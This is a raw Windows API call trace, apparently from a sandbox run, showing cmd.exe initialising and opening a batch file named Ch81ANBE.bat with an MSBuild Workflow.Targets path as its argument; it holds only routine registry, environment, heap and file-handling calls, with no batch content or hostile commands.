lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x0, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x9, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x9, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x9, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.552] RegCloseKey (hKey=0x68) returned 0x0 [0156.553] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2bc [0156.553] srand (_Seed=0x5f51e2bc) [0156.553] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" [0156.553] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" [0156.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.554] GetProcessHeap () returned 0x3a0000 [0156.554] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x210) returned 0x3b2168 [0156.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b2170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0156.555] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.555] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.555] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.555] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.555] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.555] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.555] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.555] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.555] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.555] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0156.555] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.555] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.555] GetProcessHeap () returned 0x3a0000 [0156.555] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b2c40 | out: hHeap=0x3a0000) returned 1 [0156.556] GetEnvironmentStringsW () returned 0x3b2380* [0156.556] GetProcessHeap () returned 0x3a0000 [0156.556] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xae2) returned 0x3b4ce0 [0156.556] FreeEnvironmentStringsW (penv=0x3b2380) returned 1 [0156.556] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.556] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.556] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.556] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.556] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.557] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.557] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.557] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.557] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.557] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.557] GetProcessHeap () returned 0x3a0000 [0156.557] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x54) returned 0x3b57d0 [0156.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f9f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f9f8, lpFilePart=0x31f9f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f9f4*="Desktop") returned 0x25 [0156.557] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.557] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f774 | out: lpFindFileData=0x31f774*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3b1fe8 [0156.558] FindClose (in: hFindFile=0x3b1fe8 | out: hFindFile=0x3b1fe8) returned 1 [0156.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f774 | out: lpFindFileData=0x31f774*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3b1fe8 [0156.558] FindClose (in: hFindFile=0x3b1fe8 | out: hFindFile=0x3b1fe8) returned 1 [0156.558] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0156.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f774 | out: lpFindFileData=0x31f774*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3b1fe8 [0156.558] FindClose (in: hFindFile=0x3b1fe8 | out: hFindFile=0x3b1fe8) returned 1 [0156.559] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.559] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.559] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0156.559] GetProcessHeap () returned 0x3a0000 [0156.559] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ce0 | out: hHeap=0x3a0000) returned 1 [0156.559] GetEnvironmentStringsW () returned 0x3b41f0* [0156.559] GetProcessHeap () returned 0x3a0000 [0156.559] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb36) returned 0x3b5830 [0156.560] FreeEnvironmentStringsW (penv=0x3b41f0) returned 1 [0156.560] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.560] GetProcessHeap () returned 0x3a0000 [0156.560] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b57d0 | out: hHeap=0x3a0000) returned 1 [0156.560] GetProcessHeap () returned 0x3a0000 [0156.560] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400e) returned 0x3b6370 [0156.560] GetProcessHeap () returned 0x3a0000 [0156.560] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x128) returned 0x3a0ff0 [0156.561] GetProcessHeap () returned 0x3a0000 [0156.561] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4008) returned 0x3ba388 [0156.561] GetProcessHeap () returned 0x3a0000 [0156.561] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4008) returned 0x3be398 [0156.562] GetProcessHeap () returned 0x3a0000 [0156.562] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6370 | out: hHeap=0x3a0000) returned 1 [0156.562] GetConsoleOutputCP () returned 0x1b5 [0156.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0156.562] GetUserDefaultLCID () returned 0x409 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31fb38, cchData=128 | out: lpLCData="0") returned 2 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31fb38, cchData=128 | out: lpLCData="0") returned 2 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31fb38, cchData=128 | out: lpLCData="1") returned 2 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0156.563] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0156.564] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0156.564] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.565] GetProcessHeap () returned 0x3a0000 [0156.565] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x20c) returned 0x3b2ec0 [0156.565] GetConsoleTitleW (in: lpConsoleTitle=0x3b2ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.566] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0156.566] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0156.566] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0156.567] GetProcessHeap () returned 0x3a0000 [0156.567] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3b6370 [0156.567] GetProcessHeap () returned 0x3a0000 [0156.567] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6370 | out: hHeap=0x3a0000) returned 1 [0156.569] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0156.569] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0156.569] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0156.569] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0156.569] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0156.569] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0156.569] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0156.569] GetProcessHeap () returned 0x3a0000 [0156.569] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x58) returned 0x3a1120 [0156.569] GetProcessHeap () returned 0x3a0000 [0156.569] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x72) returned 0x3c23c0 [0156.571] GetProcessHeap () returned 0x3a0000 [0156.571] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb8) returned 0x3a1180 [0156.573] GetConsoleTitleW (in: lpConsoleTitle=0x31f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.573] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0156.574] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0156.574] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0156.574] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0156.574] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0156.574] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0156.574] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0156.574] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0156.574] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0156.574] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0156.574] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0156.574] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0156.574] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0156.574] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0156.574] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0156.574] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0156.574] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0156.574] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0156.574] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0156.574] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0156.574] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0156.574] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0156.574] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0156.574] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0156.574] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0156.574] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0156.574] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0156.575] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0156.575] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0156.575] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0156.575] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0156.575] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0156.575] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0156.575] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0156.575] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0156.575] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0156.575] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0156.575] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0156.575] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0156.575] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0156.575] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0156.575] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0156.575] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0156.575] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0156.575] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0156.575] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0156.575] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0156.576] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0156.576] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0156.576] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0156.576] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0156.576] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0156.576] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0156.576] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0156.576] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0156.576] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0156.576] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0156.576] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0156.576] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0156.576] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0156.576] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0156.576] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0156.576] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0156.576] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0156.576] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0156.576] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0156.576] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0156.576] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0156.576] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0156.576] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0156.576] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0156.576] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0156.577] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0156.577] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0156.577] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0156.577] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0156.577] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0156.577] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0156.577] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0156.577] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0156.577] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0156.577] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0156.577] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0156.577] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0156.577] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0156.577] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0156.577] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0156.577] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0156.577] GetProcessHeap () returned 0x3a0000 [0156.577] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x210) returned 0x3b30d8 [0156.577] GetProcessHeap () returned 0x3a0000 [0156.577] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x122) returned 0x3b32f0 [0156.579] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0156.579] GetProcessHeap () returned 0x3a0000 [0156.579] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x418) returned 0x3b41f0 [0156.579] SetErrorMode (uMode=0x0) returned 0x0 [0156.580] SetErrorMode (uMode=0x1) returned 0x0 [0156.580] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x3b41f8, lpFilePart=0x31f350 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f350*="Desktop") returned 0x25 [0156.580] SetErrorMode (uMode=0x0) returned 0x1 [0156.580] GetProcessHeap () returned 0x3a0000 [0156.580] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b41f0, Size=0x6e) returned 0x3b41f0 [0156.580] GetProcessHeap () returned 0x3a0000 [0156.580] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b41f0) returned 0x6e [0156.580] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0156.580] GetProcessHeap () returned 0x3a0000 [0156.580] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x5a) returned 0x3a1240 [0156.580] GetProcessHeap () returned 0x3a0000 [0156.580] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa8) returned 0x3b3420 [0156.581] GetProcessHeap () returned 0x3a0000 [0156.581] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b3420, Size=0x5a) returned 0x3b3420 [0156.581] GetProcessHeap () returned 0x3a0000 [0156.581] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b3420) returned 0x5a [0156.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.581] GetProcessHeap () returned 0x3a0000 [0156.581] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe0) returned 0x3b3488 [0156.587] GetProcessHeap () returned 0x3a0000 [0156.587] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b3488, Size=0x76) returned 0x3b3488 [0156.587] GetProcessHeap () returned 0x3a0000 [0156.587] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b3488) returned 0x76 [0156.587] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.587] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x31f0ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f0ec) returned 0x3b3508 [0156.588] GetProcessHeap () returned 0x3a0000 [0156.588] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x14) returned 0x3a12a8 [0156.588] FindClose (in: hFindFile=0x3b3508 | out: hFindFile=0x3b3508) returned 1 [0156.588] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0156.588] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0156.588] GetConsoleTitleW (in: lpConsoleTitle=0x31f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.950] GetProcessHeap () returned 0x3a0000 [0157.950] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x11c) returned 0x3b3508 [0157.950] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0157.950] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0157.951] IdentifyCodeAuthzLevelW () returned 0x1 [0157.956] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0157.956] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0157.957] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0157.957] CloseCodeAuthzLevel () returned 0x1 [0157.957] SetErrorMode (uMode=0x0) returned 0x0 [0157.957] SetErrorMode (uMode=0x1) returned 0x0 [0157.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x3b30e0, lpFilePart=0x31f4b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x31f4b0*="Ch81ANBE.bat") returned 0x32 [0157.957] SetErrorMode (uMode=0x0) returned 0x1 [0157.957] GetProcessHeap () returned 0x3a0000 [0157.957] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x72) returned 0x3c2440 [0157.957] wcsspn (_String=" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", _Control=" \x09") returned 0x1 [0157.957] GetProcessHeap () returned 0x3a0000 [0157.957] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb6) returned 0x3b4940 [0157.957] GetProcessHeap () returned 0x3a0000 [0157.957] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x164) returned 0x3b4a00 [0157.957] GetProcessHeap () returned 0x3a0000 [0157.957] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4a00, Size=0xb8) returned 0x3b4a00 [0157.957] GetProcessHeap () returned 0x3a0000 [0157.957] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4a00) returned 0xb8 [0157.957] CmdBatNotification () returned 0x3b3142 [0157.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0157.958] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0157.958] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.958] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.958] _get_osfhandle (_FileHandle=3) returned 0x78 